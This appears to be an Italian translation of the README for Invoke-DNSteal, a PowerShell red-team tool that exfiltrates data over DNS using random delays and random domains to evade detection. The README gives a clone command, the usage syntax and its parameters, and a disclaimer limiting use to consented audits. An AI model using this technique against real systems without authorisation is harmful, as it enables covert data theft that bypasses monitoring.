
Esfiltrazione di dati DNS che invia payload su UDP/TCP con dimensione della query configurabile, ritardo casuale e domini casuali per eludere il rilevamento durante le operazioni red team.

Invoke-DNSteal è un semplice e personalizzabile esfiltratore di dati DNS.
Questo strumento ti aiuta a esfiltrare dati attraverso il protocollo DNS su UDP e TCP, e ti permette di controllare la dimensione delle query utilizzando un ritardo casuale. Inoltre, ti consente di evitare il rilevamento utilizzando domini casuali in ciascuna delle tue query e puoi usarlo per trasferire informazioni sia localmente che da remoto.
Si consiglia di clonare l'intero repository o scaricare il file zip. Puoi farlo eseguendo il seguente comando:
git clone https://github.com/JoelGMSec/Invoke-DNSteal.git
.\Invoke-DNSteal.ps1 -h
___ _ ____ _ _ ____ _ _
|_ _|_ __ _ __ __ | | __ __ | _ \| \ | / ___|| |__ __ __ _| |
| || '_ \ \ / / _ \| |/ / _ \_____| | | | \| \___ \| __/ _ \/ _' | |
| || | | \ V / (_) | < __/_____| |_| | |\ |___) | || __/ (_| | |
|___|_| |_|\_/ \___/|_|\_\___| |____/|_| \_|____/ \__\___|\__,_|_|
--------------------------- by @JoelGMSec --------------------------
Info: Questo strumento ti aiuta a esfiltrare dati attraverso il protocollo DNS
e ti permette di controllare la dimensione delle query utilizzando un ritardo casuale
Usage: .\Invoke-DNSteal.ps1 -t target -p payload -l length
-s server -tcponly true/false -min 3000 -max 5000
Parametri:
· Target: Dominio di destinazione per esfiltrare i dati
· Payload: Payload da inviare tramite blocchi DNS
· Length: Lunghezza del payload per controllare la dimensione dei dati
· Server: Server personalizzato per risolvere le query DNS
· TcpOnly: Imposta TcpOnly su true o false
· Delay Min: Tempo minimo di ritardo per eseguire una query in ms
· Delay Max: Tempo massimo di ritardo per eseguire una query in ms
· Random: Usa un nome di dominio casuale per evitare il rilevamento
Warning: La lunghezza (dimensione del payload) deve essere compresa tra 4 e 240
Il tempo di elaborazione aumenterà in base alla dimensione dei dati
https://darkbyte.net/exfiltrando-informacion-por-dns-con-invoke-dnsteal
Questo progetto è concesso in licenza sotto la licenza GNU 3.0 - vedi il file LICENSE per maggiori dettagli.
Questo script è stato creato e progettato da zero da Joel Gámez Molina // @JoelGMSec
Un ringraziamento speciale a @3v4si0n per l'implementazione DNS su TCP e per alcuni codici Python generali.
Questo software non offre alcun tipo di garanzia. Il suo uso è esclusivo per ambienti educativi e/o audit di sicurezza con il corrispondente consenso del cliente. Non sono responsabile per un uso improprio o per eventuali danni causati da esso.
Per maggiori informazioni, puoi trovarmi su Twitter come @JoelGMSec e sul mio blog darkbyte.net.
Puoi supportare il mio lavoro offrendomi un caffè: